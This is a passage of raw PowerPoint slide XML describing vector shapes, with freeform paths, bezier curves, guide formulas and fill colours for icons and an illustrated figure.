              <a:gd name="T10" fmla="*/ 16433 w 256"/>
              <a:gd name="T11" fmla="*/ 316089 h 216"/>
              <a:gd name="T12" fmla="*/ 0 w 256"/>
              <a:gd name="T13" fmla="*/ 332552 h 216"/>
              <a:gd name="T14" fmla="*/ 0 w 256"/>
              <a:gd name="T15" fmla="*/ 339137 h 216"/>
              <a:gd name="T16" fmla="*/ 16433 w 256"/>
              <a:gd name="T17" fmla="*/ 355600 h 216"/>
              <a:gd name="T18" fmla="*/ 78879 w 256"/>
              <a:gd name="T19" fmla="*/ 296333 h 216"/>
              <a:gd name="T20" fmla="*/ 118318 w 256"/>
              <a:gd name="T21" fmla="*/ 296333 h 216"/>
              <a:gd name="T22" fmla="*/ 138038 w 256"/>
              <a:gd name="T23" fmla="*/ 276578 h 216"/>
              <a:gd name="T24" fmla="*/ 138038 w 256"/>
              <a:gd name="T25" fmla="*/ 19756 h 216"/>
              <a:gd name="T26" fmla="*/ 118318 w 256"/>
              <a:gd name="T27" fmla="*/ 0 h 216"/>
              <a:gd name="T28" fmla="*/ 78879 w 256"/>
              <a:gd name="T29" fmla="*/ 0 h 216"/>
              <a:gd name="T30" fmla="*/ 59159 w 256"/>
              <a:gd name="T31" fmla="*/ 19756 h 216"/>
              <a:gd name="T32" fmla="*/ 59159 w 256"/>
              <a:gd name="T33" fmla="*/ 276578 h 216"/>
              <a:gd name="T34" fmla="*/ 78879 w 256"/>
              <a:gd name="T35" fmla="*/ 296333 h 216"/>
              <a:gd name="T36" fmla="*/ 190624 w 256"/>
              <a:gd name="T37" fmla="*/ 296333 h 216"/>
              <a:gd name="T38" fmla="*/ 230063 w 256"/>
              <a:gd name="T39" fmla="*/ 296333 h 216"/>
              <a:gd name="T40" fmla="*/ 249783 w 256"/>
              <a:gd name="T41" fmla="*/ 276578 h 216"/>
              <a:gd name="T42" fmla="*/ 249783 w 256"/>
              <a:gd name="T43" fmla="*/ 111948 h 216"/>
              <a:gd name="T44" fmla="*/ 230063 w 256"/>
              <a:gd name="T45" fmla="*/ 92193 h 216"/>
              <a:gd name="T46" fmla="*/ 190624 w 256"/>
              <a:gd name="T47" fmla="*/ 92193 h 216"/>
              <a:gd name="T48" fmla="*/ 170904 w 256"/>
              <a:gd name="T49" fmla="*/ 111948 h 216"/>
              <a:gd name="T50" fmla="*/ 170904 w 256"/>
              <a:gd name="T51" fmla="*/ 276578 h 216"/>
              <a:gd name="T52" fmla="*/ 190624 w 256"/>
              <a:gd name="T53" fmla="*/ 296333 h 216"/>
              <a:gd name="T54" fmla="*/ 302369 w 256"/>
              <a:gd name="T55" fmla="*/ 296333 h 216"/>
              <a:gd name="T56" fmla="*/ 341808 w 256"/>
              <a:gd name="T57" fmla="*/ 296333 h 216"/>
              <a:gd name="T58" fmla="*/ 361528 w 256"/>
              <a:gd name="T59" fmla="*/ 276578 h 216"/>
              <a:gd name="T60" fmla="*/ 361528 w 256"/>
              <a:gd name="T61" fmla="*/ 204141 h 216"/>
              <a:gd name="T62" fmla="*/ 341808 w 256"/>
              <a:gd name="T63" fmla="*/ 184385 h 216"/>
              <a:gd name="T64" fmla="*/ 302369 w 256"/>
              <a:gd name="T65" fmla="*/ 184385 h 216"/>
              <a:gd name="T66" fmla="*/ 282649 w 256"/>
              <a:gd name="T67" fmla="*/ 204141 h 216"/>
              <a:gd name="T68" fmla="*/ 282649 w 256"/>
              <a:gd name="T69" fmla="*/ 276578 h 216"/>
              <a:gd name="T70" fmla="*/ 302369 w 256"/>
              <a:gd name="T71" fmla="*/ 296333 h 21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256" h="216">
                <a:moveTo>
                  <a:pt x="10" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="246" y="216"/>
                  <a:pt x="246" y="216"/>
                  <a:pt x="246" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="216"/>
                  <a:pt x="256" y="212"/>
                  <a:pt x="256" y="206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="202"/>
                  <a:pt x="256" y="202"/>
                  <a:pt x="256" y="202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="196"/>
                  <a:pt x="252" y="192"/>
                  <a:pt x="246" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="192"/>
                  <a:pt x="10" y="192"/>
                  <a:pt x="10" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="192"/>
                  <a:pt x="0" y="196"/>
                  <a:pt x="0" y="202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="206"/>
                  <a:pt x="0" y="206"/>
                  <a:pt x="0" y="206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="212"/>
                  <a:pt x="4" y="216"/>
                  <a:pt x="10" y="216"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="48" y="180"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="180"/>
                  <a:pt x="72" y="180"/>
                  <a:pt x="72" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="180"/>
                  <a:pt x="84" y="175"/>
                  <a:pt x="84" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="12"/>
                  <a:pt x="84" y="12"/>
                  <a:pt x="84" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="5"/>
                  <a:pt x="79" y="0"/>
                  <a:pt x="7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1" y="0"/>
                  <a:pt x="36" y="5"/>
                  <a:pt x="36" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="168"/>
                  <a:pt x="36" y="168"/>
                  <a:pt x="36" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="175"/>
                  <a:pt x="41" y="180"/>
                  <a:pt x="48" y="180"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="116" y="180"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="140" y="180"/>
                  <a:pt x="140" y="180"/>
                  <a:pt x="140" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="180"/>
                  <a:pt x="152" y="175"/>
                  <a:pt x="152" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152" y="68"/>
                  <a:pt x="152" y="68"/>
                  <a:pt x="152" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152" y="61"/>
                  <a:pt x="147" y="56"/>
                  <a:pt x="140" y="56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09" y="56"/>
                  <a:pt x="104" y="61"/>
                  <a:pt x="104" y="68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104" y="175"/>
                  <a:pt x="109" y="180"/>
                  <a:pt x="116" y="180"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="184" y="180"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="208" y="180"/>
                  <a:pt x="208" y="180"/>
                  <a:pt x="208" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="215" y="180"/>
                  <a:pt x="220" y="175"/>
                  <a:pt x="220" y="168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20" y="117"/>
                  <a:pt x="215" y="112"/>
                  <a:pt x="208" y="112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="184" y="112"/>
                  <a:pt x="184" y="112"/>
                  <a:pt x="184" y="112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="112"/>
                  <a:pt x="172" y="117"/>
                  <a:pt x="172" y="124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72" y="175"/>
                  <a:pt x="177" y="180"/>
                  <a:pt x="184" y="180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67" name="Freeform 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8403EC-4BAB-4EE8-BE9A-D951DA5AFC8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10214054" y="2603160"/>
            <a:ext cx="300997" cy="342720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="108" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="184"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="184"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="52"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="108" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="138" y="160"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="22" y="160"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="22" y="22"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="22"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="138" y="62"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="138" y="160"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="160" h="184">
                <a:moveTo>
                  <a:pt x="108" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="138" y="160"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="16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ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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6F57F4E9-635A-4EB6-8967-81119E36956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371600" y="4443158"/>
            <a:ext cx="2470758" cy="1787824"/>
            <a:chOff x="4403" y="-365"/>
            <a:chExt cx="2594" cy="1877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Oval 268">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E303B56A-13B5-4FC5-9B00-D1AB3236A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3" y="1365"/>
              <a:ext cx="2594" cy="147"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="91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70" name="Freeform 201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279F1900-4045-44E7-8E62-8188AD4358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26" y="965"/>
              <a:ext cx="491" cy="405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 207"/>
                <a:gd name="T1" fmla="*/ 62 h 171"/>
                <a:gd name="T2" fmla="*/ 29 w 207"/>
                <a:gd name="T3" fmla="*/ 160 h 171"/>
                <a:gd name="T4" fmla="*/ 43 w 207"/>
                <a:gd name="T5" fmla="*/ 169 h 171"/>
                <a:gd name="T6" fmla="*/ 198 w 207"/>
                <a:gd name="T7" fmla="*/ 127 h 171"/>
                <a:gd name="T8" fmla="*/ 205 w 207"/>
                <a:gd name="T9" fmla="*/ 112 h 171"/>
                <a:gd name="T10" fmla="*/ 178 w 207"/>
                <a:gd name="T11" fmla="*/ 14 h 171"/>
                <a:gd name="T12" fmla="*/ 165 w 207"/>
                <a:gd name="T13" fmla="*/ 7 h 171"/>
                <a:gd name="T14" fmla="*/ 115 w 207"/>
                <a:gd name="T15" fmla="*/ 21 h 171"/>
                <a:gd name="T16" fmla="*/ 111 w 207"/>
                <a:gd name="T17" fmla="*/ 7 h 171"/>
                <a:gd name="T18" fmla="*/ 110 w 207"/>
                <a:gd name="T19" fmla="*/ 4 h 171"/>
                <a:gd name="T20" fmla="*/ 110 w 207"/>
                <a:gd name="T21" fmla="*/ 3 h 171"/>
                <a:gd name="T22" fmla="*/ 106 w 207"/>
                <a:gd name="T23" fmla="*/ 1 h 171"/>
                <a:gd name="T24" fmla="*/ 60 w 207"/>
                <a:gd name="T25" fmla="*/ 13 h 171"/>
                <a:gd name="T26" fmla="*/ 57 w 207"/>
                <a:gd name="T27" fmla="*/ 17 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 207"/>
                <a:gd name="T29" fmla="*/ 18 h 171"/>
                <a:gd name="T30" fmla="*/ 59 w 207"/>
                <a:gd name="T31" fmla="*/ 21 h 171"/>
                <a:gd name="T32" fmla="*/ 62 w 207"/>
                <a:gd name="T33" fmla="*/ 35 h 171"/>
                <a:gd name="T34" fmla="*/ 10 w 207"/>
                <a:gd name="T35" fmla="*/ 49 h 171"/>
                <a:gd name="T36" fmla="*/ 2 w 207"/>
                <a:gd name="T37" fmla="*/ 62 h 171"/>
                <a:gd name="T38" fmla="*/ 109 w 207"/>
                <a:gd name="T39" fmla="*/ 22 h 171"/>
                <a:gd name="T40" fmla="*/ 69 w 207"/>
                <a:gd name="T41" fmla="*/ 33 h 171"/>
                <a:gd name="T42" fmla="*/ 66 w 207"/>
                <a:gd name="T43" fmla="*/ 25 h 171"/>
                <a:gd name="T44" fmla="*/ 106 w 207"/>
                <a:gd name="T45" fmla="*/ 14 h 171"/>
                <a:gd name="T46" fmla="*/ 109 w 207"/>
                <a:gd name="T47" fmla="*/ 22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7" h="171">
                  <a:moveTo>
                    <a:pt x="2" y="62"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="160"/>
                    <a:pt x="29" y="160"/>
                    <a:pt x="29" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="166"/>
                    <a:pt x="37" y="171"/>
                    <a:pt x="43" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="127"/>
                    <a:pt x="198" y="127"/>
                    <a:pt x="198" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="125"/>
                    <a:pt x="207" y="118"/>
                    <a:pt x="205" y="112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7" y="8"/>
                    <a:pt x="171" y="5"/>
                    <a:pt x="165" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="21"/>
                    <a:pt x="115" y="21"/>
                    <a:pt x="115" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="7"/>
                    <a:pt x="111" y="7"/>
                    <a:pt x="111" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="4"/>
                    <a:pt x="110" y="4"/>
                    <a:pt x="110" y="4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09" y="0"/>
                    <a:pt x="108" y="0"/>
                    <a:pt x="106" y="1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58" y="14"/>
                    <a:pt x="57" y="15"/>
                    <a:pt x="57" y="17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62" y="35"/>
                    <a:pt x="62" y="35"/>
                    <a:pt x="62" y="35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4" y="51"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="2" y="62"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33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106" y="14"/>
                    <a:pt x="106" y="14"/>
                    <a:pt x="106" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="22"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="A08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71" name="Freeform 202">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422AC1CE-17B3-473A-BE2F-3FC9CD38A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6" y="633"/>
              <a:ext cx="95" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 40"/>
                <a:gd name="T1" fmla="*/ 33 h 33"/>
                <a:gd name="T2" fmla="*/ 8 w 40"/>
                <a:gd name="T3" fmla="*/ 23 h 33"/>
                <a:gd name="T4" fmla="*/ 2 w 40"/>
                <a:gd name="T5" fmla="*/ 9 h 33"/>
                <a:gd name="T6" fmla="*/ 16 w 40"/>
                <a:gd name="T7" fmla="*/ 3 h 33"/>
                <a:gd name="T8" fmla="*/ 40 w 40"/>
                <a:gd name="T9" fmla="*/ 12 h 33"/>
                <a:gd name="T10" fmla="*/ 32 w 40"/>
                <a:gd name="T1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33">
                  <a:moveTo>
                    <a:pt x="32" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="23"/>
                    <a:pt x="8" y="23"/>
                    <a:pt x="8" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="21"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="2" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="3"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="16" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="12"/>
                    <a:pt x="40" y="12"/>
                    <a:pt x="40" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="33"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCDB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72" name="Freeform 203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1767013-977C-4460-8772-1DC547DBC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0" y="934"/>
              <a:ext cx="72" cy="95"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 30"/>
                <a:gd name="T1" fmla="*/ 0 h 40"/>
                <a:gd name="T2" fmla="*/ 28 w 30"/>
                <a:gd name="T3" fmla="*/ 25 h 40"/>
                <a:gd name="T4" fmla="*/ 20 w 30"/>
                <a:gd name="T5" fmla="*/ 39 h 40"/>
                <a:gd name="T6" fmla="*/ 7 w 30"/>
                <a:gd name="T7" fmla="*/ 31 h 40"/>
                <a:gd name="T8" fmla="*/ 0 w 30"/>
                <a:gd name="T9" fmla="*/ 6 h 40"/>
                <a:gd name="T10" fmla="*/ 21 w 30"/>
                <a:gd name="T1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40">
                  <a:moveTo>
                    <a:pt x="21" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="25"/>
                    <a:pt x="28" y="25"/>
                    <a:pt x="28" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="31"/>
                    <a:pt x="26" y="37"/>
                    <a:pt x="20" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="40"/>
                    <a:pt x="8" y="37"/>
                    <a:pt x="7" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="6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rgbClr val="FCDB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73" name="Freeform 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB30A0A-8BBE-4884-99C0-6B7B51EC2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" y="1348"/>
              <a:ext cx="66" cy="67"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 66 w 66"/>
                <a:gd name="T1" fmla="*/ 31 h 67"/>
                <a:gd name="T2" fmla="*/ 36 w 66"/>
                <a:gd name="T3" fmla="*/ 67 h 67"/>
                <a:gd name="T4" fmla="*/ 0 w 66"/>
                <a:gd name="T5" fmla="*/ 36 h 67"/>
                <a:gd name="T6" fmla="*/ 31 w 66"/>
                <a:gd name="T7" fmla="*/ 0 h 67"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 3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66" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="3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74" name="Freeform 205">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139AC524-A7D3-4950-BD1F-88E55A6A0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1" y="1360"/>
              <a:ext cx="92" cy="114"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 39"/>
                <a:gd name="T1" fmla="*/ 7 h 48"/>
                <a:gd name="T2" fmla="*/ 36 w 39"/>
                <a:gd name="T3" fmla="*/ 21 h 48"/>
                <a:gd name="T4" fmla="*/ 17 w 39"/>
                <a:gd name="T5" fmla="*/ 43 h 48"/>
                <a:gd name="T6" fmla="*/ 4 w 39"/>
                <a:gd name="T7" fmla="*/ 45 h 48"/>
                <a:gd name="T8" fmla="*/ 4 w 39"/>
                <a:gd name="T9" fmla="*/ 45 h 48"/>
                <a:gd name="T10" fmla="*/ 3 w 39"/>
                <a:gd name="T11" fmla="*/ 31 h 48"/>
                <a:gd name="T12" fmla="*/ 26 w 39"/>
                <a:gd name="T13" fmla="*/ 4 h 48"/>
                <a:gd name="T14" fmla="*/ 35 w 39"/>
                <a:gd name="T15" fmla="*/ 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48">
                  <a:moveTo>
                    <a:pt x="35" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="11"/>
                    <a:pt x="39" y="17"/>
                    <a:pt x="36" y="21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4" y="47"/>
                    <a:pt x="8" y="48"/>
                    <a:pt x="4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0" y="41"/>
                    <a:pt x="0" y="35"/>
                    <a:pt x="3" y="31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9" y="0"/>
                    <a:pt x="31" y="4"/>
                    <a:pt x="35" y="7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75" name="Freeform 206">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCE4188-ACE7-4A5D-BA35-5B935AA32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" y="1185"/>
              <a:ext cx="69" cy="69"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 36 w 69"/>
                <a:gd name="T1" fmla="*/ 69 h 69"/>
                <a:gd name="T2" fmla="*/ 0 w 69"/>
                <a:gd name="T3" fmla="*/ 36 h 69"/>
                <a:gd name="T4" fmla="*/ 34 w 69"/>
                <a:gd name="T5" fmla="*/ 0 h 69"/>
                <a:gd name="T6" fmla="*/ 69 w 69"/>
                <a:gd name="T7" fmla="*/ 33 h 69"/>
                <a:gd name="T8" fmla="*/ 36 w 69"/>
                <a:gd name="T9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9">
                  <a:moveTo>
                    <a:pt x="36" y="69"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="69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76" name="Freeform 207">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EABE14E1-03D3-42FD-A4F3-4D8591C12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" y="1173"/>
              <a:ext cx="111" cy="95"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 40 w 47"/>
                <a:gd name="T1" fmla="*/ 37 h 40"/>
                <a:gd name="T2" fmla="*/ 26 w 47"/>
                <a:gd name="T3" fmla="*/ 36 h 40"/>
                <a:gd name="T4" fmla="*/ 5 w 47"/>
                <a:gd name="T5" fmla="*/ 17 h 40"/>
                <a:gd name="T6" fmla="*/ 4 w 47"/>
                <a:gd name="T7" fmla="*/ 3 h 40"/>
                <a:gd name="T8" fmla="*/ 4 w 47"/>
                <a:gd name="T9" fmla="*/ 3 h 40"/>
                <a:gd name="T10" fmla="*/ 18 w 47"/>
                <a:gd name="T11" fmla="*/ 4 h 40"/>
                <a:gd name="T12" fmla="*/ 43 w 47"/>
                <a:gd name="T13" fmla="*/ 27 h 40"/>
                <a:gd name="T14" fmla="*/ 40 w 47"/>
                <a:gd name="T15" fmla="*/ 3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40">
                  <a:moveTo>
                    <a:pt x="40" y="37"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="40"/>
                    <a:pt x="30" y="40"/>
                    <a:pt x="26" y="36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1" y="13"/>
                    <a:pt x="0" y="7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7" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="18" y="4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7" y="31"/>
                    <a:pt x="43" y="33"/>
                    <a:pt x="40" y="37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77" name="Freeform 208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F999A2-A56A-45A1-A6B0-E908DD07C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7" y="-365"/>
              <a:ext cx="895" cy="886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 378"/>
                <a:gd name="T1" fmla="*/ 278 h 374"/>
                <a:gd name="T2" fmla="*/ 49 w 378"/>
                <a:gd name="T3" fmla="*/ 266 h 374"/>
                <a:gd name="T4" fmla="*/ 64 w 378"/>
                <a:gd name="T5" fmla="*/ 147 h 374"/>
                <a:gd name="T6" fmla="*/ 70 w 378"/>
                <a:gd name="T7" fmla="*/ 0 h 374"/>
                <a:gd name="T8" fmla="*/ 113 w 378"/>
                <a:gd name="T9" fmla="*/ 55 h 374"/>
                <a:gd name="T10" fmla="*/ 292 w 378"/>
                <a:gd name="T11" fmla="*/ 57 h 374"/>
                <a:gd name="T12" fmla="*/ 361 w 378"/>
                <a:gd name="T13" fmla="*/ 173 h 374"/>
                <a:gd name="T14" fmla="*/ 316 w 378"/>
                <a:gd name="T15" fmla="*/ 358 h 374"/>
                <a:gd name="T16" fmla="*/ 92 w 378"/>
                <a:gd name="T17" fmla="*/ 310 h 374"/>
                <a:gd name="T18" fmla="*/ 51 w 378"/>
                <a:gd name="T19" fmla="*/ 278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8" h="374">
                  <a:moveTo>
                    <a:pt x="51" y="278"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="278"/>
                    <a:pt x="47" y="277"/>
                    <a:pt x="49" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="255"/>
                    <a:pt x="64" y="147"/>
                    <a:pt x="64" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="147"/>
                    <a:pt x="0" y="72"/>
                    <a:pt x="70" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="67" y="56"/>
                    <a:pt x="113" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="53"/>
                    <a:pt x="262" y="52"/>
                    <a:pt x="292" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="63"/>
                    <a:pt x="378" y="94"/>
                    <a:pt x="361" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="252"/>
                    <a:pt x="324" y="343"/>
                    <a:pt x="316" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="374"/>
                    <a:pt x="92" y="310"/>
                    <a:pt x="92" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="278"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="604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78" name="Freeform 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127F9D6B-FB5B-4915-9262-BEBFED918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9" y="334"/>
              <a:ext cx="101" cy="123"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
